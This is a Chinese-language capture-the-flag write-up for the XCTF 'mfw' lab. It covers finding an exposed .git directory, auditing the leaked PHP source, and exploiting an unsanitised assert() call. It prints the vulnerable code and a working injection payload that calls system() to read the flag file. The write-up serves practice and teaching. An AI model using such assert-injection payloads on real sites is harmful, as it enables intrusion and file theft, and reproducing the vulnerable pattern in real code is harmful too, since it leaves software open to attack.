基于mfw靶场实战的注入渗透

admin 2023年1月13日21:17:30评论20 views字数 1031阅读3分26秒阅读模式

前言:

本来想写一篇关于代码审计方面的,但是考虑到公众号新手很多,所以我想了想还是发一篇关于靶场的文章,这里有一小部分的代码审计,也算是一个小的实战环境了,因为这里也涉及到一些小的知识点,大家可以去靶场练练手。

基于以下靶场:

https://adworld.xctf.org.cn/challenges/details?hash=52595c4f-b564-4c87-a2fa-390e2529b5b4_2&task_category_id=3

解题思路,遇到陌生的一个网站,我们首要的是搜集一些信息,我们可以先着手收集一些明面上的信息,比如我们可以扫描一下网站目录。

这里通过扫描网站目录我们可以发现有一个/.git的目录,这个目录我们根据经验了解 git目录是程序员合作项目遗留

我们这里可以利用一个工具将其全部下载下来,当然我们也可以通过手动一个个下载下来。

这里我利用工具下载了这里面的源码,然后我们可以进行一小波代码审计

<?php
if (isset($_GET['page'])) { $page = $_GET['page'];} else { $page = "home";}
$file = "templates/" . $page . ".php";
// I heard '..' is dangerous!assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
// TODO: Make this look niceassert("file_exists('$file')"or die("That file doesn't exist!");?>


首先这里通过page利用get方式传入一个值,这个值需要与page相等,否则赋值home哥page

基于mfw靶场实战的注入渗透

然后我们发现下面的file变量会将我们传递进去的参数加上php后缀放入到目录中

基于mfw靶场实战的注入渗透


然后我们继续往下读,这里发现使用了assert函数,这里就和我们的一句话木马有点相似了啊。

我们的file变量会被带入到这一句中,那么我们就可以进行一个闭合没用的,插入我们想要执行的函数进去了

assert("strpos('$file', '..') === false")

我们想办法让这里闭合

'.system("cat ./templates/flag.php").'

这样构造之后,让前后闭合,同时可以执行中间的语句

出来之后我们查看网站源码

基于mfw靶场实战的注入渗透



原文始发于微信公众号(白安全组):基于mfw靶场实战的注入渗透

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月13日21:17:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   基于mfw靶场实战的注入渗透https://cn-sec.com/archives/1517213.html

发表评论

匿名网友 填写信息